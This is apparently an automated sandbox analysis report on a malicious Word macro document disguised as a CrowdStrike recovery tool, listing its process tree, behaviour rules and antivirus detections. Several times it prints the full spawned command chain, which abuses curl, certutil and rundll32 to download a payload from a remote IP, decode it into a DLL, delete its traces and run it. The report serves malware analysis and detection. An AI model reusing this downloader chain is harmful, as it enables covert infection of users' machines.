Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 23, 2024, 9:03 a.m. | July 23, 2024, 9:05 a.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
2552-
cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
2708-
xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp
2780 -
certutil.exe certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt
2824 -
certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe
2868 -
certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll
2924 -
rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain
2972
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm |
cmdline | "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Install itself for autorun at Windows startup | rule | Persistence | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit |
com_class | WScript.Shell | May attempt to create new processes |
parent_process | winword.exe | martian_process | "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit |
Lionic | Trojan.MSWord.EmoDldr.4!c |
CAT-QuickHeal | O97M.Downloader.36753 |
Skyhigh | Artemis!Trojan |
VIPRE | VB.Heur2.EmoDldr.5.CF3D710B.Gen |
Sangfor | VBA.Sus.Obf |
BitDefender | VB.Heur2.EmoDldr.5.CF3D710B.Gen |
Arcabit | HEUR.VBA.A.1 |
VirIT | Office.VBA_Macro_Heur |
Symantec | CL.Downloader!gen106 |
Avast | VBA:Downloader-FWG [Trj] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
Alibaba | Trojan:Script/modification.4b5b90cf |
NANO-Antivirus | Trojan.Ole2.Vbs-heuristic.druvzi |
MicroWorld-eScan | VB.Heur2.EmoDldr.5.CF3D710B.Gen |
Rising | Malware.Obfus/VBA@AI.89 (VBA) |
Emsisoft | VB.Heur2.EmoDldr.5.CF3D710B.Gen (B) |
F-Secure | Malware.VBA/AVI.Downloader.ykcxs |
DrWeb | modification of W97M.Suspicious.1 |
TrendMicro | Trojan.W97M.DOWNLOADER.E |
FireEye | VB.Heur2.EmoDldr.5.CF3D710B.Gen |
Ikarus | Win32.Outbreak |
Detected.Heuristic.Script | |
Avira | W2000M/AVI.Downloader.psxmr |
Antiy-AVL | Trojan[Downloader]/MSOffice.Agent |
Kingsoft | Win32.Troj.Undef.a |
ViRobot | DOC.Z.Agent.310160 |
ZoneAlarm | HEUR:Trojan.Script.Generic |
GData | VB.Heur2.EmoDldr.5.CF3D710B.Gen |
Varist | PP97M/Downldr.GC.gen!Eldorado |
TACHYON | Suspicious/WOX.XSR.Gen |
MAX | malware (ai score=88) |
AVG | VBA:Downloader-FWG [Trj] |
alibabacloud | Trojan:MSOffice/Heur2.Etd!iyn |
file | C:\Windows\System32\cmd.exe |